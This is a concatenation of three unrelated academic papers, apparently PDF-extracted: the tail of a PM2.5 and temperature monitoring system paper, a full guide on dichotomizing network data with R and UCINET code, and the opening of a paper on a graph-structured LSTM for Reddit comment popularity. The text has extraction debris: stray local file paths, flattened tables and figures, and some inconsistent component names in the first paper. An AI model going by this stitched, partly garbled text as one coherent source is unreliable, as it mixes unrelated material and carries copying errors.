IRED emits the light and the PD receives the light signals reflected back by the dust. When the module works normally, the IRED emits the light. If the dust particle is enough, the reflected light will received by PD, the intensity of the light signal will change the PD voltage. Then with the higher output voltage of the dust particles, the concentration of PM2.5 becomes higher. C. DS1820 temperature sensor module A DSl820 digital thermometer provides nine bits (binary) temperature readings and the single chip can communicate with DS1802. Each DS1802 has a specific sequence number. Multiple DS1820 can work on the same bus without worrying lack of the bus. The pin of the DS1820 is shown in Figure 3: GND 2 VCC R 4 P2.4 DS1820 4 .7 K 31 Figure 3. The pin of the DS1820 The measurement range of the DSl820 from -55℃ to 125℃. Two eight bits temperature values were stored. The DS1820 has two power supply mode: data bus power supply mode and external power supply mode. The first mode uses less wire but less efficiency. The latter used a single wire but faster. The DS1820 interface specifications: pin one is the ground; pin two connects the single chip P2 for data transmission; pin three connects VCC. DS1820 stored the with the nine bits temperature value. The highest bit is the symbol bit. The temperature storage of DS1820 is shown in Table3. When the temperature is negative S=1, when it is positive S=0. Such as: 00AAH indicates +85℃, 0032H is 25 ℃ and FF92H is -55℃. TABLE 3. DS1820 STORAGE Bit Bit7 Bit6 Bit5 Bit4 Bit3 Bit2 Bit1 Bit0 LS Byte 2^7 2^6 2^5 2^4 2^3 2^2 2^1 2^0 Bit Bit15 Bit14 Bit13 Bit12 Bit11 Bit10 Bit9 Bit8 MS Byte S S S S S S S S D. GSM wireless communication module GSM (Global system of mobile) is the second generation of the mobile communication technology. It promotes the globalization of the world and makes the users use one mobile phone to communicate around the world. So they produced a unified standard of the mobile phone network, namely the GSM. GSM wireless communication module adopts the SIMCOM's SIM900A module to realize the function of the short message. The SIM900A module supports most 3G or 4G mobile communications services. The TTL serial port and the RS232 module can be used for debugging. The SIM900A module has the function of the power self-starter. Firstly, the SIM card is placed in the slot and then the working mode of the SIM900A is shown in Table 4: TABLE 4. THE WORKING MODE OF THE SIM900A D5 D6 Working Status Long bright quick flashing Searching net Long bright Slow flashing Normal working Over lighting long and off short Low power Off Slow flashing Send RING Off one time and Long bright Slow flashing Receive one message GSM module realizes the function of SMS through SIM900A chip controlling the SIM card module and other modules. Nowadays it is widely used in China. E. Design the system software At first, the system initializes the flash, the port and the LCD etc[5]. Then the sensor begins work and the data collection is achieved. After the AD0832 converted, the data is displayed on the LCD1602. At this time, if the data is higher than the threshold, the buzzer alarms and the data is sent to the user's mobile phone through the GSM wireless file:///C:/Program%20Files/Common%20Files/Dict/7.5.0.0/resultui/dict/ file:///C:/Program%20Files/Common%20Files/Dict/7.5.0.0/resultui/dict/ file:///C:/Program%20Files/Common%20Files/Dict/7.5.0.0/resultui/dict/ file:///C:/Program%20Files/Common%20Files/Dict/7.5.0.0/resultui/dict/ file:///C:/Program%20Files/Common%20Files/Dict/7.5.0.0/resultui/dict/ 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 73 transmission module to complete the alarm function[6]. The software process is shown in Figure 4. start System initialization AD conversion Send Alarm or message End Press button data > threshold Display PM2.5 and temperature Modify the threshold Y N Y N Figure 4. The flow chart of the system III. ACQUISITION AND TRANSMISSION A. Data collection of the PM2.5 The data collection of the dust concentration is the key of the software programming. The data collection and processing of PM2.5 concentration is introduced in Figure 5. start Initialization Open LED Conversion to digital signal Collect 10 times Analog siganl Median filer Display result Calculation of PM2.5 Conversion to voltage value Y N End Figure 5. PM2.5 collection flow chart When the power turns on, the dust monitoring sensor initializes[7]. Then the PM2.5 sensor is waiting for the instruction from the MCU. When it receives the instruction, the sensor turns on the IRED to data acquisition, PD (photo detector) will receive the reflected light signal, and the light intensity will affect the voltage across the PD, which is sent to the MCU[8]. After received the voltage signal, the MCU controls AD0832 begin A/D conversion and the collected information send to the LCD1602, so the data acquisition is completed. B. The temperature data collection The DS1820 temperature sensor collects the temperature and returns the digital information[9].As shown in Figure 6, After initialization, the sensor reads the data in ROM: the serial number and the temperature information of DS1820[10]. The general delay 1s can read the temperature information, and then the pointer in the buffer is added to the next data reading[11]. Initialization Read ROM Initialization Delay 1 sencond Read memory Data processing Initialization Buffer pointer add one Y End Start Figure 6. The flow chart of temperature collection IV. SYSTEM TEST RESULTS The system platform is placed in the core area of the scenic area, and the sensor is opened to collect and transmit the surrounding environment parameters in real time[12]. The data collection is divided into two parts: the dust concentration acquisition and the temperature acquisition. As shown in Figure 7 (a), the LCD1602 LCD displays the temperature and PM2.5 concentration when the system is monitored. At this time the temperature is 26.8℃, and the concentration of PM2.5 is 0.029mg/m3. The concentration threshold of the PM2.5 can be set by the key circuit and the PM2.5 concentration threshold is set to 0.120mg/m3. Temp： 26.8℃ PM2.5：0.029mg/m 3 PM2.5 Alarm Set 0.120mg/m3 (a) (b) Figure 7. Data collection and concentration setting diagram When the concentration of PM2.5 exceeds the threshold, the display information on the LCD1602 LCD screen is shown in Figure 8 (a). At present, the concentration of PM2.5 is 0.157mg/m3, which exceeds the threshold 0.120mg/m3, so the GSM wireless transmission module sends the alarm information to the user, as shown in Figure 6 (b). At this time, the user sees the PM2.5 concentration alarm. The temperature is 27.9℃, and the concentration of PM2.5 is 0.157mg/m3, which is the same as the alarm information on LCD1602 LCD screen. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 74 Temp： 27.9℃ PM2.5：0.157mg/m 3 PM2.5 alarm! T:27.9℃ P:0.157mg/m 3 (a) (b) Figure 8. System alarm and SMS Through the monitoring system, the user can see the surrounding environmental parameters of the monitored area in time. So the problem of environmental monitoring in the scenic core area can be solved through the platform. V. CONCLUSIONS The monitoring system for the PM2.5 concentration and the real-time temperature is designed in this paper. The collected data was transmitted by the wireless transmission module based on the MCU. When the PM2.5 concentration is higher than a threshold, the buzzer alarms and the current environment information is sent to the mobile phone. Because the low cost and the highly performance characteristic, so it can be applied to the high-density areas. ACKNOWLEDGMENT This work was partly supported by Shaanxi Province Social Science Fund Project (NO.2016R022) of China and by the scientific research fund project of Shaanxi Provincial Department of Education (17JK1036). REFERENCES [1] G.Xu, X.Yang, and Q.Yang, et al. “Design on Magnetic Coupling R esonance Wireless Energy Transmission and Monitoring System for I mplanted Devices”, IEEE Transactions on Applied Superconductivity, vol.26, Apr. 2016, pp.1-4, doi:10.1109/TASC.2016.2524591J. [2] R.Prakash, A.B.Ganesh, and S. V.Girish. “Cooperative wireless netw ork control based health and activity monitoring system”, Journal of Medical Systems, vol.40, Oct.2016, pp.216, doi::10.1007/s10916-016 -0576-4. [3] J. C.Heo, B.Kim, and Y. N.Kim, et al. “Induction of Inflammation In Vivo by Electrocardiogram Sensor Operation Using Wireless Power Transmission”, Sensors, vol.17, Dec.2017, pp. 2905, doi:10.3390/s17 122905. [4] T.Liang, Y.J.Yuan. “Wearable Medical Monitoring Systems Based on Wireless Networks: A Review”, IEEE Sensors Journal, vol.16, Aug.2016, pp.186-8199, doi:10.1109/JSEN.2016.2597312. [5] Q.Zheng, H.Zhang, and B.Shi, et al. “In Vivo Self-Powered Wireless Cardiac Monitoring via Implantable Triboelectric Nanogenerator”, Ac s Nano, vol.10, Jul. 2016, pp.6510, doi:10.1021/acsnano.6b02693. [6] G.Anfuso, A.T.Williams, and G.C.Martínez. “Evaluation of the scenic value of 100 beaches in Cuba: Implications for coastal tourism management”, Ocean & Coastal Management, vol.142, May. 2017, pp.173-185, doi:10.1016/j.ocecoaman.2017.03.029. [7] S.Shi, Z.Wu, and F.Liu, et al. “Retention of Atmospheric Particles by Local Plant Leaves in the Mount Wutai Scenic Area, China”, Atmosphere, vol.7, Aug. 2016, pp.104, Doi:10.3390/atmos7080104. [8] P.Chen, Y.Q.Lian. “Modeling of soil loss and its impact factors in the Guijiang Karst River Basin in southern China”, Environmental Earth Sciences, vol.75, Apr. 2016, pp.352, doi:10.1007/s12665-016-5288-z. [9] J.Guo, F.Xia, and Y.Zhang. “Impact of diurnal variability and meteorological factors on the PM2.5-AOD relationship: Implications for PM2.5 remote sensing”, Environmental Pollution, vol.221, Nov.2017, pp.94, doi:10.1016/j.envpol.2016.11.043. [10] S.Samiksha, R.R.Sunder, and Nirmalkar J. “PM10 and PM2.5 chemical source profiles with optical attenuation and health risk indicators of paved and unpaved road dust in Bhopal, India”, Environmental Pollution, vol.222, Nov. 2017, pp.477-485. doi.org/10.1016/j.envpol.2016.11.067. [11] S.K.R.Boreddy, T.Mochizuki, and Kawamura K, et al. “Homologous series of low molecular weight (C1-C10) monocarboxylic acids, benzoic acid and hydroxyacids in fine-mode (PM2.5) aerosols over the Bay of Bengal: Influence of heterogeneity in air masses and formation pathways”, Atmospheric Environment, vol.167, Oct. 2017, pp.170-180, doi:10.1016/j.atmosenv.2017.08.008. [12] H.M.Lee, R.J.Park, and Henze D K, et al. “PM2.5 source attribution for Seoul in May from 2009 to 2013 using GEOS-Chem and its adjoint model”, Environmental Pollution, vol.31, Nov. 2017, pp.221.- 225, doi:10.1016/j.envpol.2016.11.088. https://doi.org/10.1109/TASC.2016.2524591 https://doi.org/10.1007/s10916-016-0576-4 https://doi.org/10.1007/s10916-016-0576-4 http://dx.doi.org/10.3390/s17122905 http://dx.doi.org/10.3390/s17122905 https://doi.org/10.1109/JSEN.2016.2597312 https://doi.org/10.1016/j.envpol.2016.11.067 work_m4vkvi4ixvf4npuqtarxoap2m4 ---- 1© 2018 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/) CONNECTIONS Issue 1 | Vol. 38Article | DOI: 10.21307/connections-2018-002 Techniques: Dichotomizing a Network Abstract This techniques guide provides a brief answer to the question: How to choose a dichotomization threshold? We propose a two step ap- proach to selecting a dichotomization threshold. We illustrate the approaches using two datasets and provide instructions on how to perform these approaches in R and UCINET. Keywords Techniques, Dichotomization. There are many reasons to dichotomize valued network data. It might be for methodological rea- sons, for example, in order to use a graph-theoret- ic concept such as a clique or an n-clan, or to use methods such as ERGMs or SAOMs, which large- ly assume binary data1. There is also the matter of visualizing networks, where fewer ties often yield a considerably more readable picture. It could also be for theoretical reasons. For example, in order to dis- tinguish between positive and negative ties, since tie strength or valence is often captured using a single scale, which then needs to be dichotomized in order to match the theory. Finally, we might be engaging in a certain kind of data smoothing: we have collect- ed data at fine levels of differences in the strength of tie, but are not confident that small differences are meaningful. We have greater confidence in a few big buckets such as strong and weak than in 100 gradu- ations of strength. Whatever the reason, if we are going dichot- omize, the question is at what level should we di- chotomize? In some cases, the situation is guided by theoretical meaningfulness and the research de- sign. For example, suppose respondents are asked to rate others on a scale of 1 = do not know them, 2 = acquaintance, 3 = friend, and 4 = family. We see there is a loose gradation from “does not know” to “knows well”; however, categories 3 and 4 do not possess so much degrees of closeness as different kinds of social relations. The choice of which to use is determined by the research question. A similar ex- ample is provided by questions that ask for a range of effects from negative to positive. If respondents are asked to rate others on a scale of 1 = dislike a lot, 2 = dislike somewhat, 3 = neither like nor dislike, 4 = like somewhat, and 5 = like a lot, for many analy- ses, it will make sense to choose a cut off of >3 or >4 for positive ties and <3 or <2 for negative ties. Note that in both of the last examples, we are still confronted with a choice of two values to choose from. In addition, if the scale points are more ambig- uous than the ones above, or if the data are counts or rankings, then there is likely no a priori way of de- ciding where to dichotomize. Here, we propose a two-step approach to di- chotomizing. Step 1 is to simply dichotomize at every level (or a collection of k bins) and examine the net- work produced at each level. Step 2 is to use simple analytics in order to obtain an informed rationale for a specific dichotomization threshold that makes sense for a given data set. Step 1 For step 1, input your valued network into your favorite network data management software and dichotomize at every level of the scale (see insert for information about how to do this in R and in UCINET). We rec- ommend always spending some time visualizing the Stephen P. Borgatti1* and Eric Quintane2 1University of Kentucky, Gatton College of Business & Econom- ics Lexington, KY. 2School of Management, The University of Los Andes, Bogota, Colombia. *E-mail: sborgatti@uky.edu. 1There are, of course, many methods that do not require di- chotomization. For example, we do not need to dichotomize in order to measure eigenvector centrality, nor to apply the relational event model (Butts, 2008). 2 Techniques: Dichotomizing a Network Table 1. One mode DGG Women by Women network projection. EV LA TH BR CH FR EL PE RU VE MY KA SY NO HE DO OL FL EVELYN 8 6 7 6 3 4 3 3 3 2 2 2 2 2 1 2 1 1 LAURA 6 7 6 6 3 4 4 2 3 2 1 1 2 2 2 1 0 0 THERESA 7 6 8 6 4 4 4 3 4 3 2 2 3 3 2 2 1 1 BRENDA 6 6 6 7 4 4 4 2 3 2 1 1 2 2 2 1 0 0 CHARLOTTE 3 3 4 4 4 2 2 0 2 1 0 0 1 1 1 0 0 0 FRANCES 4 4 4 4 2 4 3 2 2 1 1 1 1 1 1 1 0 0 ELEANOR 3 4 4 4 2 3 4 2 3 2 1 1 2 2 2 1 0 0 PEARL 3 2 3 2 0 2 2 3 2 2 2 2 2 2 1 2 1 1 RUTH 3 3 4 3 2 2 3 2 4 3 2 2 3 2 2 2 1 1 VERNE 2 2 3 2 1 1 2 2 3 4 3 3 4 3 3 2 1 1 MYRNA 2 1 2 1 0 1 1 2 2 3 4 4 4 3 3 2 1 1 KATHERINE 2 1 2 1 0 1 1 2 2 3 4 6 6 5 3 2 1 1 SYLVIA 2 2 3 2 1 1 2 2 3 4 4 6 7 6 4 2 1 1 NORA 2 2 3 2 1 1 2 2 2 3 3 5 6 8 4 1 2 2 HELEN 1 2 2 2 1 1 2 1 2 3 3 3 4 4 5 1 1 1 DOROTHY 2 1 2 1 0 1 1 2 2 2 2 2 2 1 1 2 1 1 OLIVIA 1 0 1 0 0 0 0 1 1 1 1 1 1 2 1 1 2 2 FLORA 1 0 1 0 0 0 0 1 1 1 1 1 1 2 1 1 2 2 Figure 1: DGG Women by Women dataset dichotomized above 1. 3 CONNECTIONS networks, which can be very informative regarding the emergence of clusters at certain levels of dichot- omization. For example, consider Davis et al.’s (1941) women-by-events data (often referred to as the Davis data set or the DGG data). We construct a 1-mode women-by-women network by multiplying the original by its transpose. The result is shown in Table 1. If we dichotomize at >1 and visualize, we get Figure 1. If we dichotomize at >2, we get Figure 2. And if we dichotomize at >3, we get Figure 3. Thus, the successive dichotomizations reveal a 2-group structure, which is illuminating2. In oth- er networks, successive dichotomization confirms a core/periphery structure. For example, the BKFRAT data set (Bernard et al., 1980) gives the number of times each pair of actors was seen interacting by an observer. The values range from 0 to 51. If we dichot- omize at > 0, we get Figure 4. If we dichotomize at > 2, we get Figure 5. Dichotomizing at > 4, we get Figure 6. Dichotomizing at > 6, we get Figure 7. And so on. Core-periphery structures have a kind of self-similarity property where the main component always looks the same regardless of what level of dichotomization produced it. Step 2 (three approaches) Now, successive dichotomizations are informative, but our original question was about choosing a sin- gle dichotomization that would be used in all further analyses, which is where step 2 becomes important. For step 2, we present three potential approaches. The first will horrify some people. This approach is to choose the level of dichotomization that maximizes your results. For example, suppose you are predicting managers’ performance as a function of between- ness centrality. For each possible level of dichoto- mization, you measure betweenness centrality and regress performance on betweenness, along with any control variables. The level of dichotomization that yields the highest r2 is the one you choose. As we said, some people (scientists, statisticians, and people of good character) will be horrified3. There is definitely a danger of overfitting. The predictions work really well for this one data set, but perhaps not Figure 2: DGG Women by Women dataset dichotomized above 2. 2However, this should not be taken as definitive. Various normalizations of the data, as well as bipartite representa- tions, tend to show a third smaller subgroup. See Freeman (2003) for a related discussion. 3On the other hand, these same people are happy to use regression to find the optimal coefficients to show a rela- tionship between their explanatory variable and a depend- ent. Perhaps, we should ask them to choose the coeffi- cients a priori on the basis of strong theory. 4Of course, if you have these other datasets on hand, then you could pick the level of dichotomization that yields the highest average r2 across all datasets. The same applies if you have multiple DVs and IVs – you pick that level of dichotomization that gives the best results across all data- sets, DVs, and IVs. 4 Techniques: Dichotomizing a Network for others, 4. The other issue is that the particular di- chotomization value that scores highest may be an odd value that you cannot explain. For example, sup- pose we carry out this procedure and get the results shown in Table 2. Clearly, we would choose 5, but how to make sense of these results? They rise and fall with no rhyme or reason. In this case, we would strongly advise against taking this approach. On the other hand, if the results were something like those presented in Table 3, we would be comforted by the underlying regular- ity and feel good about choosing 5, even though we might be hard-pressed to explain why medium density worked best. A slightly less controversial version of this ap- proach might be to choose the dichotomized version of your network that maximizes the repli- cation of results from past studies. For example, we know from past studies that actors with higher levels of self-monitoring are more likely to receive Figure 4: BKS FRATERNITY dataset dichotomized above 0. Figure 3: DGG Women by Women dataset dichotomized above 3. 5 CONNECTIONS more friendship nominations. We could choose the dichotomization threshold that maximizes the relationship between self-monitoring and new friendship nominations, even if the test of our hy- pothesis has to do with betweenness centrality and performance. That was the first approach. The second approach is less controversial. Dichotomization, by its very nature, is a distortion of the data5. Where once you had nuance, you now have just ‘has tie’ and ‘not tie.’ This does violence to your data. The question is, how Figure 5: BKS FRATERNITY dataset dichotomized above 2. 5Clearly, in some cases, distorting the data is what we are looking for, for example, when distinguishing between neg- ative and positive ties. In this case, we should not expect the dichotomized data to preserve the properties of the original dataset and we should either use a theoretically or literature driven approach or revert to approach 1. Figure 6: BKS FRATERNITY dataset dichotomized above 4. 6 Techniques: Dichotomizing a Network much? Suppose, as in an analysis of variance, you predicted your valued data from your dichotomized data. Some cutoff values are going to yield better pre- dictions than others. Here is an example using the Da- vis, Gardner, and Gardner women-by-women data. In the table below, the first column is the dichotomization value. For example, value 4 means that the data were dichotomized at ≥ 4. Dichotomizing at ≥ 4 results in a network with 48 ties, which corresponds to a density of 0.16. The interesting part is the correlation column, which achieves its maximum at ≥ 3 (correlation 0.81). The correlation refers to the correlation between the original valued matrix and the dichotomized matrix. A correlation of 0.81 is extremely high. Yes, the data Table 2. R-square of models predicting performance using betweenness centrality at different levels of dichotomization. Dichot. level R2 1 0.05 2 0.29 3 0.02 4 0.01 5 0.31 6 0.06 7 0.11 8 0.02 9 0.23 Table 3. R-square of models predicting performance using betweenness centrality at different levels of dichotomization. Dichot. level R2 1 0.05 2 0.09 3 0.12 4 0.23 5 0.31 6 0.27 7 0.22 8 0.15 9 0.07 Figure 7: BKS FRATERNITY dataset dichotomized above 6. 7 CONNECTIONS are distorted by dichotomizing, but the dichotomized matrix still retains a very high resemblance to the origi- nal data. We have chosen a level of dichotomization that does the least violence to the original data (Table 4). Interestingly, ≥ 3 is the level just below the one at which the network splits into two large components (along with four isolates). At ≥ 4, the network looks like this, as shown in Figure 8 The third approach is theory based, and can be harder to implement. There are certain cases where we can use the emergent properties of the dichot- omized networks themselves in order to identify the correct dichotomization threshold, just like when we noticed the appearance of clusters while visually in- specting different dichotomization thresholds in the DGG data. As an example, let us consider an ap- proach proposed by Freeman (2003) to distinguish between weak and strong ties. In his piece on the strength of weak ties, Granovetter (1973) argues that an important characteristic of strong ties is that if A is strongly tied to B, and B is strongly tied to C, then A is likely to be at least weakly tied to C. In his analysis of the DGG data, Freeman (2003) refers to Granovetter’s transitivity rule as g-transitivity. A data set is perfectly g-transitive if there are no violations of g-transitivity. Given a valued data set (and selecting a value such as zero as an indicator of no ties), Freeman’s proposal is to dichotomize the data set at every possible cutoff and calculate the number of violations of g-transitivity at each level. The lowest cutoff with an acceptable number of violations (such as zero) identifies the strong tie. For example, applied to the Davis women data, we get Table 5. The table shows that at ≥ 4, the number of g- transitive triples is 160 and the number of intransitive triples is 0. Hence, ties 4 or above are strong ties, and ties < 4 but > 0 are weak ties. Combining this with our previous approach, we might summarize the situation as follows. Dichoto- mizing at ≥ 3 optimally identifies ties of any kind in terms of the least-violence criterion, and maintains a single large component (plus isolates). Dichotomizing at ≥ 4 identifies strong ties, which strongly fragment the network. The latter is useful for sharply outlining a subgroup structure, while the former enables the calculation of measure that requires connected net- works (aside from isolates) (Figure 9). Table 4. Z-score, correlation, number of ties and density of the DGG dataset at different dichotomization levels. Value Z-score Correlation Ties Density 7 3.352 0.271887 2 0.006536 6 2.667 0.646625 16 0.052288 5 1.983 0.666829 18 0.058824 4 1.298 0.781314 48 0.156863 3 0.613 0.811928 92 0.300654 2 −0.072 0.720115 190 0.620915 1 −0.756 0.457341 278 0.908497 0 −1.441 306 1.000000 Table 5. Number of g-transitive and intransitive triples in the DGG dataset at different dichotomization levels. Value Trans Intrans 7 0 0 6 26 0 5 30 0 4 160 0 3 526 4 2 2,032 44 1 3,786 292 0 4,448 448 8 Techniques: Dichotomizing a Network It is worth noting that Freeman’s approach needs not be limited to maximizing g-transitivity. On theoretical grounds, we may identify a specific mechanism that organizes ties. For example, we may see a status mechanism such at the Matthew effect in which nodes that already have a lot of ties tend to attract even more ties. Now, to dichotomize valued data, we choose the cutoff that maximizes the extent to which there are just a few nodes with many ties and a great many nodes with few ties. Alternatively, we might choose the cutoff to maximize the level of transitivity in the network. Conclusion This “How to” guide on dichotomization is intend- ed to provide guidance on how to find a suitable threshold for dichotomization for social network data. We propose that in all cases, we should start by creating multiple versions of the dichotomized network at every possible value of the threshold and inspect them visually. Then, we suggest three sepa- rate approaches in order to choose (and justify your choice of) a single threshold based on (i) maximiz- Figure 9: DGG Women by Women dataset dichotomized at 3. Strong ties in bold. Figure 8: DGG Women by Women dataset dichotomized at 4. 9 CONNECTIONS ing expected results, (ii) minimizing distortions, and (iii) identifying specific emergent properties in the network. References Bernard, H., Killworth, P. and Sailer, L. 1980. In- formant accuracy in social network data IV. Social Net- works 2: 191–218. Butts, C.T. 2008. A relational event framework for social action. Sociological Methodology 38: 155–200. Davis, A., Gardner, B. B. and M. R. Gardner 1941. Deep South, Chicago: The University of Chicago Press. Freeman, L.C. 2003. Finding social groups: a meta-analysis of the southern women data, in Breiger, R., Carley, K., and Pattison, P. (Eds), Dynamic social network modeling and analysis: workshop summary and papers Committee on Human Factors, National Research Council: 39–45, National Acade- mies Press. Granovetter, M. 1973. The strength of weak ties. American Journal of Sociology 81: 1287–303. 10 Techniques: Dichotomizing a Network Figure A1: Screenshot of Netdraw. Addendum 2 – UCINET To visualize successive dichotomizations in UCINET, one opens the valued data as usual and presses the + sign in the rels tab at right to raise the level of di- chotomization by one unit, see Figure A1, below. This can also be done in the command line intern- face (CLI) as follows: ->d1 = dichot(women ge 1) ->d2 = dichot(women ge 2) ->d3 = dichot(women ge 3) Etc. Addendum 1 – R Script #Import the Davis data set in R, assuming that it is already in a text file, for example exported from UCINET. library(readr) davis <- as.matrix(read.csv(“davis.txt”,sep = “\t”, row.names = 1)) #Create a one-mode network by multiplying the original matrix by its transpose davisonemode <- davis %*% t(davis) diag(davisonemode) <- 0 #Dichotomize the network at all values davisonemodedic <- array(dim = c(NROW(davi- sonemode),NCOL(davisonemode),max(davisone- mode))) for (i in 1:max(davisonemode)) { davisonemodedic[,,i] <- ifelse(davisonemode >= i, 1, 0) } #Visualize all networks library(sna) par(mfrow = c(4,2)) for (i in 1:max(davisonemode)) { plot(as.network(davisonemodedic[,,i])) } #Correlation between original network and dichot- omized networks, and some descriptive statistics stats <- array(dim = c(max(davisonemode),4)) colnames(stats) <- c(“Threshold”, “Correlation”, “Num of 1 s”, “Density”) for (i in 1:max(davisonemode)) { stats[i,1] <- i stats[i,2] <- summary(qaptest(list(davisonemode, davisonemodedic[,,i]), gcor, g1 = 1, g2 = 2))$test stats[i,3] <- sum(davisonemodedic[,,i]) stats[i,4] <- stats[i,3]/(NROW(davisonemode)*(N- ROW(davisonemode) - 1)) } stats 11 CONNECTIONS Figure A2: Screenshot of UCINET’s Interactive Dichotomization routine’s results. In addition, the network could be drawn after each step: ->draw d1 ->draw d2 Etc. To compute the correlation between an original data set and successive dichotomizations of it, we can use UCINET’s Transform|Interactively Dichoto- mize procedure. Figure A2 below shows this proce- dure applied to the DGG women data. Finally, to execute Freeman’s strong-weak-null tie decomposition based on g-transitivity, we can use UCINET’s command line interface (CLI) as shown in Table A1. Table A1. G-transitivity decomposition command line instruction and output in UCINET. ->dsp gtrans(women) 1 2 3 4 Level Trans Intrans Possible Prop Trans -------- -------- -------- -------- -------- 7 0 0 0 6 26 0 26 1 5 30 0 30 1 4 160 0 160 1 3 526 4 530 0.992 2 2,032 44 2,076 0.979 1 3,786 292 4,078 0.928 0 4,448 448 4,896 0.908 work_m5ynmpp4jnfqfaura642udcc4a ---- Conversation Modeling on Reddit Using a Graph-Structured LSTM Victoria Zayats Electrical Engineering Department University of Washington vzayats@uw.edu Mari Ostendorf Electrical Engineering Department University of Washington ostendor@uw.edu Abstract This paper presents a novel approach for mod- eling threaded discussions on social media using a graph-structured bidirectional LSTM (long-short term memory) which represents both hierarchical and temporal conversation structure. In experiments with a task of predicting popularity of comments in Reddit discussions, the proposed model outperforms a node-independent architecture for different sets of input features. Analyses show a bene- fit to the model over the full course of the dis- cussion, improving detection in both early and late stages. Further, the use of language cues with the bidirectional tree state updates helps with identifying controversial comments. 1 Introduction Social media provides a convenient and widely used platform for discussions among users. When the comment-response links are preserved, those con- versations can be represented in a tree structure where comments represent nodes, the root is the original post, and each new reply to a previous com- ment is added as a child of that comment. Some examples of popular services with tree-like struc- tures include Facebook, Reddit, Quora, and Stack- Exchange. Figure 1 shows an example conversa- tion on Reddit, where bigger nodes indicate higher upvoting of a comment.1 In services like Twitter, 1The tool https://whichlight.github.io/ reddit-network-vis was used to obtain this visualiza- tion. Figure 1: Visualization of a sample thread on Reddit. tweets and their retweets can also be viewed as form- ing a tree structure. When time stamps are avail- able with a contribution, the nodes of the tree can be ordered and annotated with that information. The tree structure is useful for seeing how a discussion unfolds into different subtopics and showing differ- ences in the level of activity in different branches of the discussion. Predicting popularity of comments in social me- dia is a task of growing interest. Popularity has been defined in terms of the volume of the re- sponse, but when the social media platform has a mechanism for readers to like or dislike com- ments (or, upvote/downvote), then the difference in positive/negative votes provides a more informative score for popularity prediction. This definition of 121 Transactions of the Association for Computational Linguistics, vol. 6, pp. 121–132, 2018. Action Editor: Ani Nenkova. Submission batch: 11/2016; Revision batch: 3/2017; Published 2/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. (a) Forward hierarchical and timing structure (b) Backward hierarchical and timing structure Figure 2: An example of model propagation in a graph-structured LSTM. Here, the node name are shown in a chrono- logical order, e.g. comment t1 was made earlier than t2. 2(a) Propagation of graph-structured LSTM in the forward direction. Blue arrows represent hierarchical propagation, green arrows represent timing propagation.2(b) Backward hierarchical (blue) and timing (green) propagation of graph-LSTM. popularity, which has also been called community endorsement (Fang et al., 2016), is the task of inter- est in our work on tree-structured modeling of dis- cussions. Previous studies found that the time when the comment/post was published has a big impact on its popularity (Lakkaraju et al., 2013). In addition, the number of immediate responses can be predic- tive of the popularity, but some comments with a high number of replies can be either controversial or have a highly negative score. Language should be extremely important for distinguishing these cases. Indeed, community style matching is shown to be correlated to comment popularity in Reddit (Tran and Ostendorf, 2016). However, learning useful lan- guage cues can be difficult due to the low frequency of these events and the dominance of time, topic and other factors. Thus, in several prior studies, au- thors constrained the problem to reduce the effect of those factors (Lakkaraju et al., 2013; Tan et al., 2014; Jaech et al., 2015). In this study, we have no such constraints, but attempt to use the tree structure to capture the flow of information in order to better model the context in which a comment is submitted, including both the history it responds to as well as the subsequent response to that comment. To capture discussion dynamics, we introduce a novel approach to modeling the discussion using a bidirectional graph-structured LSTM, where each comment in the tree corresponds to a single LSTM unit. In one direction, we capture the prior his- tory of contributions leading up to a node, and in the other, we characterize the response to that com- ment. Motivated by prior findings that both response structure and timing are important in predicting pop- ularity (Fang et al., 2016), the LSTM units include both hierachical and temporal components to the up- date, which distinguishes this work from prior tree- structured LSTM models. We assess the utility of the model in experiments on popularity prediction with Reddit discussions, comparing to a neural net- work baseline that treats comments independently but leverages information about the graph context and timing of the comment. We analyze the results to show that the graph LSTM provides a useful sum- mary representation of the language context of the comment. As in Fang et al. (2016), but unlike other work (He et al., 2016), our model makes use of the full discus- sion thread in predicting popularity. While knowl- edge of the full discussion is only useful for post- hoc analysis of past discussions, it is reasonable to consider initial responses to a comment, particularly given that many responses occur within minutes of someone posting a comment. Comments are often popular because of witty analogies made, which re- quires knowledge of the world beyond what is cap- tured in current models. Responses to these com- ments, as well as to controversial comments, can improve popularity prediction. Responses of others 122 clearly influence the likelihood of someone to like or dislike a comment, but also whether they even read a comment. By introducing a forward-backward tree- structured model, we provide a mechanism for lever- aging early responses in predicting popularity, as well as a framework for better understanding the rel- ative importance of these responses. The main contributions of this paper include: a novel approach for representing tree-structured lan- guage processes (e.g., social media discussions) with LSTMs; evaluation of the model on the pop- ularity prediction task using Reddit discussions; and analysis of the performance gains, particularly with respect to the role of language context. 2 Method The proposed model is a bidirectional graph LSTM that characterizes a full threaded discussion, assum- ing a tree-structured response network and account- ing for the relative order of the comments. Each comment in a conversation corresponds to a node in the tree, where its parent is the comment that it is re- sponding to and its children are the responding com- ments that it spurs ordered in time. Each node in the tree is represented with a single recurrent neural net- work (RNN) unit that outputs a vector (embedding) that characterizes the interim state of the discussion, analogous to the vector output of an RNN unit which characterizes the word history in a sentence. In the forward direction, the state vector can be thought of as a summary of the discussion pursued in a partic- ular branch of the tree, while in the backward di- rection the state vector summarizes the full response subtree that followed a particular comment. The state vectors for the forward and backward direc- tions are concatenated for the purpose of predicting comment karma. The RNN updates – both forward and backward – incorporate both temporal and hier- archical (tree-structured) dependencies, since com- menters typically consider what has already been said in response to a parent comment. Hence, we refer to it as a graph-structured RNN rather than a tree-structured RNN. Figures 2(a) and 2(b) show an example of the state connections associated with hi- erarchical and timing structures for the forward and backward RNNs, respectively. The supervision signal in training will impact the character of the state vector, and the forward and backward state sub-vectors are likely to capture dif- ferent phenomena. Here, the objective is to predict quantized comment karma. We anticipate that the forward state will capture relevance and informa- tiveness of the comment, and the backward process will capture sentiment and richness of the ensuing discussion. The specific form of the RNN used in this work is an LSTM. The detailed implementation of the model is described in the sections to follow. 2.1 Graph-structured LSTM Each node in the tree is associated with an LSTM unit. The input xt is an embedding that can incorpo- rate both comment text and local submission context features associated with thread structure and timing, described further in section 2.2. The node state vec- tor ht is generated using a modification of the stan- dard LSTM equations to include both hierarchical and timing structures for each comment. Specifi- cally, we use two forget gates - one for the previous (or subsequent) hierarchical layer, and one for the previous (or subsequent) timing layer. In order to describe the update equations, we 